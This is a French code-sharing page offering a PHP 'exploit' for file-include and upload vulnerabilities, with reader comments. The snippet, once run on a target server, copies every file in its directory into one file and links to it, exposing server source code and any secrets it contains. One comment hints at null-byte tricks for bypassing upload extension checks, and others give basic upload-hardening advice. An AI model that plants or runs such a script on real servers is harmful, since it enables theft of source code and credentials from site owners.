Exploi faille include & upload

Soyez le premier à donner votre avis sur cette source.

Snippet vu 19 465 fois - Téléchargée 27 fois

Contenu du snippet

faille include coté serveur, un clik=le code (lecture des fichiers!)

Source / Exemple :


<?

$dir=opendir('.');
$output="code.own";

$fpout = fopen($output, "a");

while ($file = readdir($dir))
 {
  if ($fpout)
  {
    if ((filetype($file) == "dir") || ($file == $output))
    ;
    else
    {
      $fpin = fopen($file, "r");
      if ($fpin)
      {
        fputs($fpout, "\n".$file."\n");

        while (!feof($fpin))
        {
            $line=fgets($fpin,1024);
            fputs($fpout,$line);
        }
        fclose($fpin);
      }
    }
  }
 }
 echo "<a href=$output> Show source :-)</a>";
 
closedir($dir);
fclose($fpout);

?>

Conclusion :


La securité avant tout!

A voir également

Ajouter un commentaire

Commentaires

Messages postés
4
Date d'inscription
dimanche 3 juin 2007
Statut
Membre
Dernière intervention
2 février 2012

Solution la plus efficace pour vous protéger (upload de fichier je parle)
Comme l'a dit renaud288 en 2004 :
- addslashes dans les post et get
- parser le contenu du fichier (pas obligatoire...) pour y trouver un code php

L'ultime solution :
- Renommer le fichier recu en quelque chose . extension obligatoire
exemple :
j'upload script.php
La page qui analyse et traite l'upload le renomme en asdj012.png
TOUJOURS RENOMMER PAR L'EXTENSSION DESIREE ! et voila vous êtes protégé... mais jamais a 100%
Messages postés
4
Date d'inscription
dimanche 3 juin 2007
Statut
Membre
Dernière intervention
2 février 2012

Pour ceux qui ont suivis le sujet de discussion ...
Même si tu n'autorise que des fichier .jpg, ou .png, bref des images, il y a des façons de contourner cette protection.

Les vrais complèterons la suite : nu**b**e ... le truc avec un % :) voyez ?
Je ne voudrais pas être plus explicite.
Si vous savez de quoi je parle, vous n'avez rien a faire ici et connaissez ces méthodes de contournement.
Si vous ne savez pas de quoi je parle, ce script pourrait ne jamais vous être utile, donc vous n'avez rien a faire ici non plus :)
Messages postés
1
Date d'inscription
samedi 8 août 2009
Statut
Membre
Dernière intervention
8 août 2009

xD je ne mis connais pas super bien en ordi, vous pouvez l'expliquer en français san le langage ordi?
Messages postés
39
Date d'inscription
samedi 28 août 2004
Statut
Membre
Dernière intervention
11 janvier 2007

bon code, mais manque un peux de commentaire pour les novices, c'est pour ca que je met que 8, car des commentaire permette une meilleur lecture et compréhention du code

sinon GG ;)
Messages postés
39
Date d'inscription
samedi 28 août 2004
Statut
Membre
Dernière intervention
11 janvier 2007

bon code, mais manque un peux de commentaire pour les novices, c'est pour ca que je met que 8, car des commentaire permette une meilleur lecture et compréhention du code

sinon GG ;)
Afficher les 52 commentaires

Vous n'êtes pas encore membre ?

inscrivez-vous, c'est gratuit et ça prend moins d'une minute !

Les membres obtiennent plus de réponses que les utilisateurs anonymes.

Le fait d'être membre vous permet d'avoir un suivi détaillé de vos demandes et codes sources.

Le fait d'être membre vous permet d'avoir des options supplémentaires.